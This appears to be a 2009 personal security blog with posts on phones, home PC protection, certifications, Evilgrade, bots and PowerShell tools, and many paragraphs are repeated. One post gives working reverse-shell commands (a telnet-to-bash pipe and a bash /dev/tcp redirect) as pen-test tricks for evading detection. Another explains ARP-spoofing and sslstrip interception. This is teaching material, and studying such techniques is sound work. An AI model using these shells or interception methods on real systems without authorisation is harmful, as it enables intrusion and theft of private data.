To learn more check out their page at L0phtCrack. I'm going to run some benchmarks on this guy this coming weekend. I'm probably gonna put it up against 0phcrack and John the Ripper. Unfortunately, I do not have a 64bit machine to test with but the new Mac is multi core so we can see how much it can take advantage of it. That is if it runs well in a virtual environment as I don't see a Mac version.
Thursday, June 4, 2009
iPhone fun
OK so it has been a while since I have posted. As some of you may already know, this is mainly because I am working back in the DC area. I am on a couple week contract as surge support in a NOC move. We shall see what happens after that.
So while on this contract I was given an iPhone to be contacted. I found this a great chance for me to see just how cool it was. Sure I have played with them before but not at the length of time that I have it for now. So far, I'm a fan. There are a lot of little cool apps that I find handy. It seems that the free ones have their downfalls sometimes but heck some of the good ones are only .99 cents! The best thing I have experienced with it is web browsing. I have a Samsung Omnia, this was as close as I could get to an iPhone on Verizon at this time. I like the Omnia but to be honest web browsing isn't easy enough to make me want to do it all of the time. It's a nice to have feature that I have used but mainly I use it for email and tethering. For those things, it rocks.
The iPhone, however, makes browsing a fun experience. It is so useful that I do it all of the time now. I attribute this to the way the browser resizes. Opera mobile has some of this ability but no where near the level that Safari does on this guy. It's also helpful to have normal headset jack. The Omnia requires an adapter which is a pain to carry. This guy just plugs up with your normal earbuds which makes it much more attractive. With that in mind, it makes me want to listen to more podcasts like the SANS storm center daily and pauldotcom weekly. I also purchased a nice RSS reader that imported my opal list of RSS feeds. The reader formats it nice and keeps me busy when I'm waiting for stuff.
Overall I'm happy with the device. I'm not a fan of AT&T still as I have complete dead zones on the phone when my Omnia is happy tethering me away at full 3G speeds. I will say though, if Verizon does get to offer the iPhone next year, I'm on it.
So while on this contract I was given an iPhone to be contacted. I found this a great chance for me to see just how cool it was. Sure I have played with them before but not at the length of time that I have it for now. So far, I'm a fan. There are a lot of little cool apps that I find handy. It seems that the free ones have their downfalls sometimes but heck some of the good ones are only .99 cents! The best thing I have experienced with it is web browsing. I have a Samsung Omnia, this was as close as I could get to an iPhone on Verizon at this time. I like the Omnia but to be honest web browsing isn't easy enough to make me want to do it all of the time. It's a nice to have feature that I have used but mainly I use it for email and tethering. For those things, it rocks.
The iPhone, however, makes browsing a fun experience. It is so useful that I do it all of the time now. I attribute this to the way the browser resizes. Opera mobile has some of this ability but no where near the level that Safari does on this guy. It's also helpful to have normal headset jack. The Omnia requires an adapter which is a pain to carry. This guy just plugs up with your normal earbuds which makes it much more attractive. With that in mind, it makes me want to listen to more podcasts like the SANS storm center daily and pauldotcom weekly. I also purchased a nice RSS reader that imported my opal list of RSS feeds. The reader formats it nice and keeps me busy when I'm waiting for stuff.
Overall I'm happy with the device. I'm not a fan of AT&T still as I have complete dead zones on the phone when my Omnia is happy tethering me away at full 3G speeds. I will say though, if Verizon does get to offer the iPhone next year, I'm on it.
Friday, May 29, 2009
Hackers Don't Want my PC
Many people would tell you this when the subject of protecting your home system comes up. Is this true? "I don't bank online", "I don't shop online"; people say all of these things in a defense of why they believe they are safe. Is that true? Not at all! Just because you may not have anything they want along those lines, you have something very valuable! Your PC sitting idle all night, normally on a broadband connection. This is most likely more valuable then your personal eBay account or that credit card that you have, which is probably maxed out anyway :).
Your idle CPU cycles are great for lots of things. Sending SPAM, herding other bots in a botnet used for many purposes, housing stolen software or music and the list goes on and on. I stumbled on this article from the Washington Post via Slashdot:
The Scrap Value of Hacked PCs
If anyone says no one would want their PC you can tell them the stuff you read here or better yet, give them the link to read it for themselves. The article is very brief and doesn't get technical at all really but it gets to the point. No PC is safe!
How can you protect your machine?
1. Get a good Malware tool for protection and removal.
I recommend Malwarebytes. Download the free trial version. The trial is fully functional; you just do not get real time protection. What that means is that it will remove Virus/Spyware/Adware etc, but it doesn't run in the background to protect you from getting it in the first place. Thus, you should think of getting one that runs real time as well. Using multiple vendors is not a bad idea. The truth is that sometimes one may come out with a new definition quicker than another.
2. Get and keep your Anti Virus applications up to date.
There are many free antivirus applications out there. I would not recommend ClamAV here because at this time there is no real time protection. It is a good AV solution for network appliances that can use it in real time, not yet for the home user in my opinion. I have a friend in Canada that is working on a real time engine for it for his Masters project. He anticipates having it ready in the next year or two. I use AVG and have come to like it. I would recommend paying for a program though. The reason is because most of these free ones rely on definitions. The problem is that there are encoding techniques that will bypass 90% of antivirus programs today. What this means is that you can be infected with the oldest virus known to vendors again because it appears different to your application. Thus you should purchase an anti virus program that includes what is called IPS (Intrusion Prevention System). These types of antivirus programs work on unusual system functions rather than only definitions. I also recommend Symantec. Many people will tell you they don't like it and we are all entitled to our own opinions. I have found it to be one of the better ones out there in my opinion. Others would tell you McAfee. I have not had good luck with McAfee and thus don't recommend it but your mileage may vary.
3. Protect from the network
For those that might be a little more technically inclined I also recommend Untangle. Look for their option called the "Re-router" technology. This is an excellent network appliance that provides high level protection. The Re-Router option they have is really nice as you just need to install it on one of your Windows PC's that is connected via Ethernet cable to your switch/router. This one system then provides protection for every computer in your house. It is NOT a replacement for your Antivirus/IPS system on the host, only in addition to. I assist in the development of new features for this device so I may be a bit biased :), but it is a very nice set of applications.
4. Keep your applications and operating systems up to date.
Run your Windows, Mac or Linux updates as much as possible. If you have an automatic method, use that. Don't forget your third party applications as well. If you read my post from the other day, this can be dangerous so use caution. Read my post from a few days ago to learn what you can do to keep this from backfiring on you. But by all means do the updates! Attacks come from vulnerabilities in applications probably more than any other method. Keeping up to date on this stuff makes it harder for them to gain control in the first place.
5. Don't underestimate the power of shutting down your computer when you are not using it. Maybe even shut off your router or modem. If you don't need it on, then don't have it on. This is especially true if you are going on vacation or something.
If anyone has any other Security/AV questions or needs assistance in any of these applications feel free to email me. I offer general security consulting for free and do not mind in helping out. Yes that goes for businesses as well as home users!
This is by no means an exhaustive list of things you can do. It is just some examples to get you started. I love security and do security for the fact that I believe computers, networks and the Internet should be and remain a good and fun tool for us all. I hate that we have to be so cautious and in some cases don't use it at all because of the threats out there.
Your idle CPU cycles are great for lots of things. Sending SPAM, herding other bots in a botnet used for many purposes, housing stolen software or music and the list goes on and on. I stumbled on this article from the Washington Post via Slashdot:
The Scrap Value of Hacked PCs
If anyone says no one would want their PC you can tell them the stuff you read here or better yet, give them the link to read it for themselves. The article is very brief and doesn't get technical at all really but it gets to the point. No PC is safe!
How can you protect your machine?
1. Get a good Malware tool for protection and removal.
I recommend Malwarebytes. Download the free trial version. The trial is fully functional; you just do not get real time protection. What that means is that it will remove Virus/Spyware/Adware etc, but it doesn't run in the background to protect you from getting it in the first place. Thus, you should think of getting one that runs real time as well. Using multiple vendors is not a bad idea. The truth is that sometimes one may come out with a new definition quicker than another.
2. Get and keep your Anti Virus applications up to date.
There are many free antivirus applications out there. I would not recommend ClamAV here because at this time there is no real time protection. It is a good AV solution for network appliances that can use it in real time, not yet for the home user in my opinion. I have a friend in Canada that is working on a real time engine for it for his Masters project. He anticipates having it ready in the next year or two. I use AVG and have come to like it. I would recommend paying for a program though. The reason is because most of these free ones rely on definitions. The problem is that there are encoding techniques that will bypass 90% of antivirus programs today. What this means is that you can be infected with the oldest virus known to vendors again because it appears different to your application. Thus you should purchase an anti virus program that includes what is called IPS (Intrusion Prevention System). These types of antivirus programs work on unusual system functions rather than only definitions. I also recommend Symantec. Many people will tell you they don't like it and we are all entitled to our own opinions. I have found it to be one of the better ones out there in my opinion. Others would tell you McAfee. I have not had good luck with McAfee and thus don't recommend it but your mileage may vary.
3. Protect from the network
For those that might be a little more technically inclined I also recommend Untangle. Look for their option called the "Re-router" technology. This is an excellent network appliance that provides high level protection. The Re-Router option they have is really nice as you just need to install it on one of your Windows PC's that is connected via Ethernet cable to your switch/router. This one system then provides protection for every computer in your house. It is NOT a replacement for your Antivirus/IPS system on the host, only in addition to. I assist in the development of new features for this device so I may be a bit biased :), but it is a very nice set of applications.
4. Keep your applications and operating systems up to date.
Run your Windows, Mac or Linux updates as much as possible. If you have an automatic method, use that. Don't forget your third party applications as well. If you read my post from the other day, this can be dangerous so use caution. Read my post from a few days ago to learn what you can do to keep this from backfiring on you. But by all means do the updates! Attacks come from vulnerabilities in applications probably more than any other method. Keeping up to date on this stuff makes it harder for them to gain control in the first place.
5. Don't underestimate the power of shutting down your computer when you are not using it. Maybe even shut off your router or modem. If you don't need it on, then don't have it on. This is especially true if you are going on vacation or something.
If anyone has any other Security/AV questions or needs assistance in any of these applications feel free to email me. I offer general security consulting for free and do not mind in helping out. Yes that goes for businesses as well as home users!
This is by no means an exhaustive list of things you can do. It is just some examples to get you started. I love security and do security for the fact that I believe computers, networks and the Internet should be and remain a good and fun tool for us all. I hate that we have to be so cautious and in some cases don't use it at all because of the threats out there.
Tuesday, May 19, 2009
When is there an incident?
I just wanted to post this as a question to those that do read this blog, all 2 of you :P. I had a discussion with a security admin the other day. They wanted me to take a look at their incident handling document. This document outlined the steps that they would take in the case of an incident. Now don't get me wrong, the document was spot on I believe. It was well written and you can tell a proper balance of technical and informational data was found. What this did bring up in my mind is; When has an incident, specifically a compromise, happened that a process like this needs to be put into action?
I realize there is a balance that needs to happen because if we did this same routine for every system infected with a virus, management would probably start to not trust things are going well (little boy crying wolf). What about a bot though? If you are not familiar with bots, you can read previous posts I have put on this blog or just Google the term and you should run into a ton of information. Long story short is that bots are used to control systems. The problem that I see is that a lot of companies downplay the significance of a bot. Just because at this time that bot is only popping up ads on your PC doesn't mean the attacker has any less than full control of your system. In my mind, a party outside of your network, often unknown to you, has full control of one of your systems. That sounds like a compromise or incident to me. It only takes one update from the bot's command and control center to turn it into something much more horrifying.
Now there are controls in place like IDS and IPS systems which can often block and alert of the existence of such a software. This is a good thing. The question is though, should this be treated like an incident of compromise or should it be quietly removed and cleaned up because it was caught so early? I guess a third option would be to have a non management alerted incident handling process in place as well. Not that we want to cover these tracks, but for the security admin to keep track of but possibly release at some quarterly meeting saying "we had x many major incidents and y many minor incidents". It's an interesting thought to find that balance. I would love to hear some opinions.
I realize there is a balance that needs to happen because if we did this same routine for every system infected with a virus, management would probably start to not trust things are going well (little boy crying wolf). What about a bot though? If you are not familiar with bots, you can read previous posts I have put on this blog or just Google the term and you should run into a ton of information. Long story short is that bots are used to control systems. The problem that I see is that a lot of companies downplay the significance of a bot. Just because at this time that bot is only popping up ads on your PC doesn't mean the attacker has any less than full control of your system. In my mind, a party outside of your network, often unknown to you, has full control of one of your systems. That sounds like a compromise or incident to me. It only takes one update from the bot's command and control center to turn it into something much more horrifying.
Now there are controls in place like IDS and IPS systems which can often block and alert of the existence of such a software. This is a good thing. The question is though, should this be treated like an incident of compromise or should it be quietly removed and cleaned up because it was caught so early? I guess a third option would be to have a non management alerted incident handling process in place as well. Not that we want to cover these tracks, but for the security admin to keep track of but possibly release at some quarterly meeting saying "we had x many major incidents and y many minor incidents". It's an interesting thought to find that balance. I would love to hear some opinions.
Automatic Updates
So you are a good user that does their software updates right? Windows Automatic updates are turned on and going. How about those third party applications like Java, Winzip, iTunes or even notepad++? You have those automatically update right? What you are about to see will probably cause most of you to run over and shut those down now! It's quite scary. While the attack is relatively simple as far as technical aspects go, it seems to me that it can be a way to get into systems that you would think not possible otherwise due to the dilligence of some users to update their applications.
Evilgrade
Here is a demonstration from John Strand:
John Strand's Evilgrade demo
It looks, works and feels like metasploit. This just goes to show that we need to verify updates with checksums on the software company's website, if they offer one. If not, we should be testing them in a lab to see how the react first. This even goes for those of us distributing these via something like SCCM or Shavlik. Keep your eyes peeled for these types of things! People get very sneaky when you have a resource they want.
Evilgrade
Here is a demonstration from John Strand:
John Strand's Evilgrade demo
It looks, works and feels like metasploit. This just goes to show that we need to verify updates with checksums on the software company's website, if they offer one. If not, we should be testing them in a lab to see how the react first. This even goes for those of us distributing these via something like SCCM or Shavlik. Keep your eyes peeled for these types of things! People get very sneaky when you have a resource they want.
Monday, May 11, 2009
On the Ruby wagon
So I started taking a look at Ruby this past week. So far it seems pretty easy. It is an interesting method for a language. From what I am reading, one of the goals was to make it read like real sentences. Why did I bother to start looking at it? Mainly because Metasploit consists of a lot of Ruby. It appears that it is moving in this direction from Perl. There are some other applications that I have been looking into that use it as well. With all of the other stuff on my plate, I'm not sure how far I'm gonna get with it any time soon. Here is a good book that I am going through to learn it. The author has an interesting style which makes it easy to read:
Why's (poignant) guide to Ruby
Why's (poignant) guide to Ruby
Friday, May 8, 2009
Certification Roadmap
So after my post the other day, I started thinking long and hard about where I want to go professionally, specifically in regards to the vehicle of which certs to focus on to get there. After that process here is my plan (for those that care :))
I'm finally going to schedule my GPEN for the 18th of next month. My next goal is to obtain my CISSP by the end of the year. There is an exam time being held in Atlanta on December 19th. My goal will be to get it at that time. I will probably take some time off from then until the end of the year. Starting Jan. 1st of next year, I am going to focus on getting the GSEC certification. Following that, GCIA, then finally GCIH. I would like to have all of those three done by June of next year. The reason being is that I would like to have two gold papers done for two of those certifcations by the following summer so I can shoot for the GSE.
Why the timeline? Well you have a time limit of 6 months for each of your gold papers. This gives me the full 6 months even if I can finish them early. Why do the gold papers? The simple answer is that they are prerequisites for the GSE certification. For those of you that are not familiar with the GSE, the exam is only held once a year. At this time there are only 13 people with this certification. It is a rigorous process. After the prerequisites and acceptance to take the lab exam the process includes a multiple choice exam covering a wide variety of topics, much like the other GIAC exams. The second is a two day hands on lab. The lab consists of a rigorous battery of hands on exercises drawn from a large range of security domains. The second day consists of on Incident Response Scenario that requires the candidate to analyze data and report their results in a written incident report as well as an oral report.
In short it covers the following skillset:
I'm finally going to schedule my GPEN for the 18th of next month. My next goal is to obtain my CISSP by the end of the year. There is an exam time being held in Atlanta on December 19th. My goal will be to get it at that time. I will probably take some time off from then until the end of the year. Starting Jan. 1st of next year, I am going to focus on getting the GSEC certification. Following that, GCIA, then finally GCIH. I would like to have all of those three done by June of next year. The reason being is that I would like to have two gold papers done for two of those certifcations by the following summer so I can shoot for the GSE.
Why the timeline? Well you have a time limit of 6 months for each of your gold papers. This gives me the full 6 months even if I can finish them early. Why do the gold papers? The simple answer is that they are prerequisites for the GSE certification. For those of you that are not familiar with the GSE, the exam is only held once a year. At this time there are only 13 people with this certification. It is a rigorous process. After the prerequisites and acceptance to take the lab exam the process includes a multiple choice exam covering a wide variety of topics, much like the other GIAC exams. The second is a two day hands on lab. The lab consists of a rigorous battery of hands on exercises drawn from a large range of security domains. The second day consists of on Incident Response Scenario that requires the candidate to analyze data and report their results in a written incident report as well as an oral report.
In short it covers the following skillset:
- General security skills
- Incident handling skills
- Intrusion detection and analysis skills
Sunday, May 3, 2009
Summer Reading List
Some of you may know that I have been trying to compile a list of books to go through. I have attempted to create a sort of "book club" to get a bunch of people together to go through them, sharing what we all have learned. That didn't take off to well. I started with Hacking The Art Of Exploitation. This was an excellent book. I learned a lot! It is not for the faint of heart though. Get ready to dig into some serious C code. It definitely makes me want to go back and dust off what I remember of C and learn it again. At that time, I may reread the book in attempt to get even more out of it.
So whats next on my list? Well, I have two that are in a toss up. The first is Snort IDS and IPS toolkit by Jay Beale. Though I have also been thinking about the O'reilly book Beautiful Security.
Here is the remainder of my year's reading list:
Wireshark and Ethereal Network Protocol Analyzer Toolkit
Nessus Network Auditing
Metasploit Penetration Development Vulnerability Research
Shellcoders Handbook: Discovering Exploiting Security
Reversing: Secrets of Reverse Engineering
Rootkits: Subverting The Windows Kernel
Web Application Hackers Handbook: Discovering and Exploiting Security Flaws
Database Hackers Handbook: Defending Servers
This is in no specific order yet. On top of all of this I really need to knock out this GPEN certification and the CISSP by the end of the year. Following soon behind that is the renewal of the CCNA. I'm probably going to do the CCNA Security, suprise :). This will renew my CCNA and add the Security peice to the end.
As many of you know I have been working on an IT security degree as well. While I hate to quit things, I really have a hard time finding a school that can teach real security things that are helpful in the real world as well as relevant. I am looking at the University of Advancing Technology. I guess the security program here was started by the same guy that started the Defcon conferences. That has some merrit to it. The class outline looks to be relevant. So I may atted there to finish my degree.
To be quite honest I stumbled over an old favorite in my browser the other day of the infamous lab of Scott Morris. At the end of his resume page there is a link to how he came to be where he is: Scott's Story. After reading that story, I felt like I can just keep on doing what I do, how I do it and who needs school. If any of you reading this know me personally, that's not an unfamiliar statement. So maybe I won't go back. This is hard to tell at the moment. It would sure help me focus on getting my GPEN and CISSP out of the way rather than having to come home and do homework every night. Who know's. Time will tell.
So if any of you out there want to join in the reading list, leave a comment or email me.
So whats next on my list? Well, I have two that are in a toss up. The first is Snort IDS and IPS toolkit by Jay Beale. Though I have also been thinking about the O'reilly book Beautiful Security.
Here is the remainder of my year's reading list:
Wireshark and Ethereal Network Protocol Analyzer Toolkit
Nessus Network Auditing
Metasploit Penetration Development Vulnerability Research
Shellcoders Handbook: Discovering Exploiting Security
Reversing: Secrets of Reverse Engineering
Rootkits: Subverting The Windows Kernel
Web Application Hackers Handbook: Discovering and Exploiting Security Flaws
Database Hackers Handbook: Defending Servers
This is in no specific order yet. On top of all of this I really need to knock out this GPEN certification and the CISSP by the end of the year. Following soon behind that is the renewal of the CCNA. I'm probably going to do the CCNA Security, suprise :). This will renew my CCNA and add the Security peice to the end.
As many of you know I have been working on an IT security degree as well. While I hate to quit things, I really have a hard time finding a school that can teach real security things that are helpful in the real world as well as relevant. I am looking at the University of Advancing Technology. I guess the security program here was started by the same guy that started the Defcon conferences. That has some merrit to it. The class outline looks to be relevant. So I may atted there to finish my degree.
To be quite honest I stumbled over an old favorite in my browser the other day of the infamous lab of Scott Morris. At the end of his resume page there is a link to how he came to be where he is: Scott's Story. After reading that story, I felt like I can just keep on doing what I do, how I do it and who needs school. If any of you reading this know me personally, that's not an unfamiliar statement. So maybe I won't go back. This is hard to tell at the moment. It would sure help me focus on getting my GPEN and CISSP out of the way rather than having to come home and do homework every night. Who know's. Time will tell.
So if any of you out there want to join in the reading list, leave a comment or email me.
Monday, April 20, 2009
Second Post Today...
I was just sitting catching up on some news while drinkin' my morning joe and I had to comment on this. The article from Wired magazine; "The Great Brazillian Sat-Hack Crackdown" just makes me laugh! I am not one to condone illegal activity. What's more I am a licensed HAM radio user and I really believe in proper use of frequency. However, to call the people that use these sats for communication, criminals is probably going too far. What is the real scary part of this story? In case you missed it, the Navy's Fleet Satellite Communication system, or FLTSATCOM runs unencrypted!
Now before you say "They said drug lords use them to communicate and that makes it a crime". Lets look at reality. What available medium is not used for crime these days? Internet, yes, Cell phones, yes, HAM radios, yes. So all of these things must be illegal too. Comm'on!
Do I think there are ways that the "legit" users could do things a bit better to take advantage of free, or low cost communications? I do. However, in some circumstances you have to do what you can with what you got. In the mean time, when are governments going to start to realize that if you don't want people listening to your stuff, encrypt it! They can listen to our conversations that are in the open without any problems, why can't we listen to what they have to say over an open frequency?
Now before you say "They said drug lords use them to communicate and that makes it a crime". Lets look at reality. What available medium is not used for crime these days? Internet, yes, Cell phones, yes, HAM radios, yes. So all of these things must be illegal too. Comm'on!
Do I think there are ways that the "legit" users could do things a bit better to take advantage of free, or low cost communications? I do. However, in some circumstances you have to do what you can with what you got. In the mean time, when are governments going to start to realize that if you don't want people listening to your stuff, encrypt it! They can listen to our conversations that are in the open without any problems, why can't we listen to what they have to say over an open frequency?
Backdoor without Netcat
So you want to get a remote shell on that box but you either cannot install software for some reason or your rules of engagement state that this is out of scope. No problem! Here is a handy little trick using our builtin tools.
Start two netcat listeners on your Windows machine:
C:\> nc -l -p 80
C:\> nc -l -p 443
From your Linux box now run the following command which opens our backdoor:
telnet [Windows Box IP] 80 | /bin/bash | telnet [Windows Box IP] 443
The interesting thing here is that everything you type in the port 80 window, the results will show up in the port 443 window. You now have remote shell to that Linux box. Probably the nicest thing about this one is that we are opening two ports from our Linux box to the Internet. Port 80 and port 443. Most likely these ports are allowed out from the box in most cases. Unless there is an IDS/IPS in place, this should skirt right under the radar.
Now if you are on a Linux box with good 'ol /dev/tcp, here is another way to do this:
On your Windows box start a netcat listener:
C:\>nc -l -p 80
Then on your Linux box run the following:
/bin/bash -i > /dev/tcp/[Windows Box IP]/80 0<&1 2>&1
Let's break this down. The -i after bash tells it to run in interactive mode. We will then take our Standard Input from the bash shell (0) and redirect this (<) to a duplicated (&) Standard Output (1). The second part is taking our Standard Error (2) of our bash shell and redirecting (>) this into a duplicated (&) Standard Output (1).
OK so that's some kick butt command line kung fu-rey. This is just one of the really nice things about taking a class at SANS. Ed Skoudis and John Strand are very good instructors (I don't mean to leave out the others. I'm sure they are good as well, I just haven't had the pleasure of taking a class from them yet). These alternate techniques came out of a challenge session between a few of the SANS instructors. They basically challenged each other "What if you don't have netcat in your pen test". These are some of the answers that came out. We did a lot more than this. We saw how to do port scans with /dev/tcp, telnet and ftp! Yes ftp! All of this without installing software on the target box.
Personally I perfer not to install software if possible. I do think clients of whom you will be pen testing would love to hear "we don't install malware or tools on your box unless completely necessary to gain access". I can just imagine them getting the warm fuzzies from this.
If you have any cool little tricks like this to share, please comment! If you like this command line stuff, you can also browse on over to the Commandline KungFu blog, where you will see these challenges that Ed Skoudis and others partake in. I have learned a bunch from this blog, not only for pen testing, but for making system administration easier too!
Start two netcat listeners on your Windows machine:
C:\> nc -l -p 80
C:\> nc -l -p 443
From your Linux box now run the following command which opens our backdoor:
telnet [Windows Box IP] 80 | /bin/bash | telnet [Windows Box IP] 443
The interesting thing here is that everything you type in the port 80 window, the results will show up in the port 443 window. You now have remote shell to that Linux box. Probably the nicest thing about this one is that we are opening two ports from our Linux box to the Internet. Port 80 and port 443. Most likely these ports are allowed out from the box in most cases. Unless there is an IDS/IPS in place, this should skirt right under the radar.
Now if you are on a Linux box with good 'ol /dev/tcp, here is another way to do this:
On your Windows box start a netcat listener:
C:\>nc -l -p 80
Then on your Linux box run the following:
/bin/bash -i > /dev/tcp/[Windows Box IP]/80 0<&1 2>&1
Let's break this down. The -i after bash tells it to run in interactive mode. We will then take our Standard Input from the bash shell (0) and redirect this (<) to a duplicated (&) Standard Output (1). The second part is taking our Standard Error (2) of our bash shell and redirecting (>) this into a duplicated (&) Standard Output (1).
OK so that's some kick butt command line kung fu-rey. This is just one of the really nice things about taking a class at SANS. Ed Skoudis and John Strand are very good instructors (I don't mean to leave out the others. I'm sure they are good as well, I just haven't had the pleasure of taking a class from them yet). These alternate techniques came out of a challenge session between a few of the SANS instructors. They basically challenged each other "What if you don't have netcat in your pen test". These are some of the answers that came out. We did a lot more than this. We saw how to do port scans with /dev/tcp, telnet and ftp! Yes ftp! All of this without installing software on the target box.
Personally I perfer not to install software if possible. I do think clients of whom you will be pen testing would love to hear "we don't install malware or tools on your box unless completely necessary to gain access". I can just imagine them getting the warm fuzzies from this.
If you have any cool little tricks like this to share, please comment! If you like this command line stuff, you can also browse on over to the Commandline KungFu blog, where you will see these challenges that Ed Skoudis and others partake in. I have learned a bunch from this blog, not only for pen testing, but for making system administration easier too!
Friday, April 17, 2009
Man in the Middle
Remember the good old days when we would fire up Cain or dsniff and do a man in the middle attack? What was the big problem with this technique? If you said the invalid certificate, you would be right. For those of you not familiar with this, here is the quick and dirty.
Arp being a trusting soul will accept an update from anyone by default. With that in mind we set our computers to tell all of the other computers on the network that we are their default gateway. We do this via an ARP packet. We continue to send these packets out making sure they don't forget that we are in fact their default gateway. Now all of their traffic comes though us. Since we know the real MAC address of the real gateway, we send those packets out as normal. Pretty cool. The user is none the wiser at this point.
Now, Joe User decides to head on over to his bank site which uses HTTPS encryption. When we intercept that packet we terminate that secure connection and establish a new connection from us to the bank. For that brief moment when Joe's packets come to us and we send them off, it is all unencrypted. Very cool. Problem! The certificate we send to Joe for the HTTPS session is signed by us because we do not have the private key of the bank site....yet :)) When Joe's PC sees this incorrect certificate, it throws a warning message saying DON'T GO ON OR YOU WILL BE pWNED! OK it really doesn't say that but you have all seen the warning before.
Most people will click right through that not caring one bit. For those of us that are a little more security conscious though, we stop and investigate. Our plan is now foiled. Game over :(.
Enter sslstrip. This nifty tool makes our game go on. Whats interesting about sslstrip is that no certificate error is sent. It simply redirects you to a http session which your browser doesn't care about HTTPS certificates for these sites. So no more warnings, we can just capture away. If you want to be a little more sly you could send a new favicon.ico on with the packets to Joe that is a picture of a little lock. Looks secure :) muhahah! Very cool tool. MITM is possible again. So I will leave you with a video from pauldotcom showing how this cool tool works. I'm off to $tarbucks to pwn some private information, I mean surf some websites :)
John Strand's Channel showing SSLStrip and more!
Arp being a trusting soul will accept an update from anyone by default. With that in mind we set our computers to tell all of the other computers on the network that we are their default gateway. We do this via an ARP packet. We continue to send these packets out making sure they don't forget that we are in fact their default gateway. Now all of their traffic comes though us. Since we know the real MAC address of the real gateway, we send those packets out as normal. Pretty cool. The user is none the wiser at this point.
Now, Joe User decides to head on over to his bank site which uses HTTPS encryption. When we intercept that packet we terminate that secure connection and establish a new connection from us to the bank. For that brief moment when Joe's packets come to us and we send them off, it is all unencrypted. Very cool. Problem! The certificate we send to Joe for the HTTPS session is signed by us because we do not have the private key of the bank site....yet :)) When Joe's PC sees this incorrect certificate, it throws a warning message saying DON'T GO ON OR YOU WILL BE pWNED! OK it really doesn't say that but you have all seen the warning before.
Most people will click right through that not caring one bit. For those of us that are a little more security conscious though, we stop and investigate. Our plan is now foiled. Game over :(.
Enter sslstrip. This nifty tool makes our game go on. Whats interesting about sslstrip is that no certificate error is sent. It simply redirects you to a http session which your browser doesn't care about HTTPS certificates for these sites. So no more warnings, we can just capture away. If you want to be a little more sly you could send a new favicon.ico on with the packets to Joe that is a picture of a little lock. Looks secure :) muhahah! Very cool tool. MITM is possible again. So I will leave you with a video from pauldotcom showing how this cool tool works. I'm off to $tarbucks to pwn some private information, I mean surf some websites :)
John Strand's Channel showing SSLStrip and more!
Friday, April 3, 2009
A Kick butt tool
OK, so as you all might know I have been stumbling on new cool command line techniques on the Windows platform. It started with the SANS 560 class, but has run beyond that now. I am an avid follower of Ed Skoudis' Command Line KungFu blog as well. Ed, and others bring out a lot of cool ways to do things from the command line. It is very pen tester centric but I find that it comes in handy in other places as well.
To get more to the point, yesterday I had to pull a list of emailboxes of a certain size from a Microsoft Exchange server. Sure I could have opened Exchange System Manager, but the command line junkie in me said "there has to be a better way". So I started doing a little bit of searching. Quickly I came across how to do this with PowerShell. I though, man if only I could use PowerShell to get this and other things done in an pure XP/2003 environment.
Guess what? Not only can you install PowerShell on XP, but I also found this kick butt addon that will probably make any Windows admin out there drool, especially if they are constantly having to pull reports from AD, Exchange and systems in general.
Scoot on over to PowerGUI.org. This handy tool gives you a nice little GUI to store and retrieve all of your precious PowerShell scripts. The IDE in it even does the recognition of keywords, sorry not a programer to remember what they call that. Basically if you start to type a word and it matches a known command it will give you the listed matches to autocomplete for you. All nice right?
The next good thing is the PowerPacks! There are PowerPacks for all kinds of stuff and growing. I found a PowerPack for Exchange 03. Found a PowerPack for AD that not only allows me to save off nice querries for reports but also lets me restore deleted items from AD! You read that right. Bring those users back with the same GUID and SID! This is freakin awesome because you used to have to pay for that handy feature. There are PowerPacks for OCS , SQL, Citrix and more. It is a community based project so there is lots of colaboration and sharing going on. The thing not to forget is that it is all just an IDE for PowerShell scripting. Add you own, share what you have done, try the shared objects.
I thought all of the remote desktops apps I found the other week were kewl, but it turns out that outside of security land, this is the coolest app I have seen in some time that actually helps out on the job.
To get more to the point, yesterday I had to pull a list of emailboxes of a certain size from a Microsoft Exchange server. Sure I could have opened Exchange System Manager, but the command line junkie in me said "there has to be a better way". So I started doing a little bit of searching. Quickly I came across how to do this with PowerShell. I though, man if only I could use PowerShell to get this and other things done in an pure XP/2003 environment.
Guess what? Not only can you install PowerShell on XP, but I also found this kick butt addon that will probably make any Windows admin out there drool, especially if they are constantly having to pull reports from AD, Exchange and systems in general.
Scoot on over to PowerGUI.org. This handy tool gives you a nice little GUI to store and retrieve all of your precious PowerShell scripts. The IDE in it even does the recognition of keywords, sorry not a programer to remember what they call that. Basically if you start to type a word and it matches a known command it will give you the listed matches to autocomplete for you. All nice right?
The next good thing is the PowerPacks! There are PowerPacks for all kinds of stuff and growing. I found a PowerPack for Exchange 03. Found a PowerPack for AD that not only allows me to save off nice querries for reports but also lets me restore deleted items from AD! You read that right. Bring those users back with the same GUID and SID! This is freakin awesome because you used to have to pay for that handy feature. There are PowerPacks for OCS , SQL, Citrix and more. It is a community based project so there is lots of colaboration and sharing going on. The thing not to forget is that it is all just an IDE for PowerShell scripting. Add you own, share what you have done, try the shared objects.
I thought all of the remote desktops apps I found the other week were kewl, but it turns out that outside of security land, this is the coolest app I have seen in some time that actually helps out on the job.
Wednesday, April 1, 2009
more on bots
Not sure what set me in bot mode this week, but I have been intrigued by them and started a deeper study. That coupled with today supposing to be Conficker's day to check in to it's CnC for updates probably has helped keep it a topic on my mind as well.
So sure they work on IRC in a lot of cases. IRC is a pretty straight forward protocol that many of us are probably at least a little familiar with. What though are the reasons for bots, techniques of bots and how can we protect against them? I would go as far as recommending a three step process:
1. Egress filtering at your edge firewall. This is going to block any traffic that you do not trust. Most people block untrusted communication from the Internet in, but I'm talking from the LAN out! Depending on your firewall maker, you may only get a good port blocker, which should help in a lot of cases, but if you have a firewall that is doing deep packet inspection, you can get most of your problem traffic stopped before these bots can phone home.
2. Update your OS and applications! This may seem like a no brainer, and you may say "I have automatic updates on". The problem is that many of these bots and other malware are turning that service off or tricking that process into thinking it's checking in, when it really isn't. Also notice that I said applications as well. As much as we all like to bash Microsoft for being insecure, a lot of new techniques are being used to take advantage of thrid party applications as well because these tend to be ignored or harder to update automatically.
3. Update your AntiVirus. This is twofold. A lot of people think they are fine with that Norton 2003, (mentioned for example purposes only), because they are getting their signature updates still. The problem with that is these malware are becoming polymorphic. These types of malware cannot be noticed with general signatures. They have to be caught by recognizing abnormal traffic. The newer AV engines are able to view this type of behavior through other signatures and IPS functionality. If you are not also updating your AV engine, you might as well not update your signatures either.
OK, thats probably going too far, but it is important. We also need to make sure we are getting updates. Check the definition file date from time to time to ensure it is up to date. I have my AV update a couple times a day, in most cases I'm suprised to see a definition file that is more than 24 hours old.
